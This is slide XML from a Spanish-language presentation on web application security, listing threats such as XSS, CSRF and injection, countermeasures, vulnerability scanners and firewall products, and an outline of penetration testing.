          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>6. Convertir todos los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>caracteres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>no alfa numéricos a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>caracteres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>de entidad HTML antes de mostrar la entrada del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>usuario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>en buscadores y foros.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>7. Utilizar herramientas de prueba extensivamente durante la fase de diseño para eliminar agujeros XSS en la aplicación antes de comenzar a utilizarla.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>8. Desarrollar algunos scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>estándar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>o firmados con claves públicas y privadas que comprueben efectivamente para comprobar que el script introducido fue realmente autenticado.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3535876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defenderse contra ataques </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>DoS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Configurar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>el firewall para denegar acceso de tráfico ICMP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Asegurar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>la administración remota y pruebas de conectividad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Prevenir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>el uso de funciones innecesarias como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>gets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>, y direcciones de retorno de direcciones de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>sobre escritura, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Prevenir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>sobre escritura </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>de la información sensible.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Realizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>una validación completa de entrada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Los </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>datos procesados por el atacante no deben dejarse ejecutar.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32304162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defenderse de los ataques de servicios Web?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Configurar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>Control de acceso WSDL, para permitir o denegar acceso de cualquier </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>tpo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t> de mensajes SOAP basados en WSDL, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Implementar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>firewalls capaces de proteger servicios Web, nivel de filtrado SOAP y ISAPI, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>Implementar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>solicitudes centralizadas in-line y respuestas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0" smtClean="0"/>
              <a:t>validación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="3000" dirty="0"/>
              <a:t>de esquema, bloquear referencias externas, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4028781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normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Impedir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>redirecciones y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>renvíos, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>caso contrario asegurarse que el valor provisto es válido y autorizado para el usuario.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>crear o utilizar algoritmos débiles, generar las claves offline y almacenarlas de manera segura.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Cerrar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>sesión </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>inmediatamente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>después de utilizar aplicaciones Web y limpiar el historial, no permitir que su navegador y sitios web guarden detalles de inicio de sesión.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Utilizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2800" dirty="0"/>
              <a:t>SSL.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116545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Amenazas a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Manipulación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>invalidado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Cross </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Scripting (XSS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Inyección </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de defectos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Falsificación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de solicitudes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>site</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Ruptura </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de control de acceso.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Mala </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>configuración en la seguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Administración </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de sesión violado.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Exploits</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de plataforma.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32135188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Contramedidas</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Solicitudes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>NO SSL deben ser redirigidas a sitios SSL, asegurarse que el certificado es válido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Definir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>derechos de acceso a áreas protegidas en el sitio web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>almacenar contraseñas en cookies en texto claro o con encriptación </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>débil.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Configurar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>mecanismos de seguridad y apagar los servicios que no se utilizan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Realizar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>validación de valores de dominio, tipos y patrones en todos los datos de entrada.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Validar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" sz="2600" dirty="0"/>
              <a:t>de manera fuerte las entradas del usuario.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2171825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Herramientas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Seguridad</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Acunetix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Scanner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Falcove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Scanner.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Netsparker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>N-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Stalker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t> Security Scanner.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25537885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Herramientas de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Seguridad</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Application Firewall: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>dotDefender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, IBM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AppScan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ServerDefender</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> VP.</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35745823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smtClean="0"/>
              <a:t>Test de Intrusión a Aplicaciones </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Utilizado para identificar, analizar y reportar vulnerabilidades, validación de entradas, buffer </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>salto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>autenticación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>, ejecución de código, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>La mejor manera es conduciendo una serie de pruebas y metódicas pruebas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>- Identificación de puertos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>- Verificación de vulnerabilidades.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>- Corrección de vulnerabilidades.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12241318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smtClean="0"/>
              <a:t>Test de Intrusión Aplicaciones Web</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35602068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37011" y="476672"/>
            <a:ext cx="7358636" cy="5976664"/>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13356537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smtClean="0"/>
              <a:t>Obtener Información</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9955373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612255" y="620688"/>
            <a:ext cx="7919491" cy="5616624"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20847369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sz="4800" dirty="0" smtClean="0"/>
              <a:t>Testear la administración de la configuración</a:t>
            </a:r>
            <a:endParaRPr lang="es-BO" sz="4800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13966697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57199" y="476648"/>
            <a:ext cx="8430287" cy="6048696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-BO" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52577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Amenazas a las aplicaciones Web</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="2 Marcador de contenido"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Referencias </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>directas de objetos inseguros.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Insuficiente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>Protección de la capa de transporte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Fallo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>en la restricción de acceso URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Almacenamiento </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>criptográfico inseguro.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-BO" dirty="0" smtClean="0"/>
              <a:t>Cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-BO" dirty="0"/>
              <a:t>spoofing</a:t>
            </a:r>
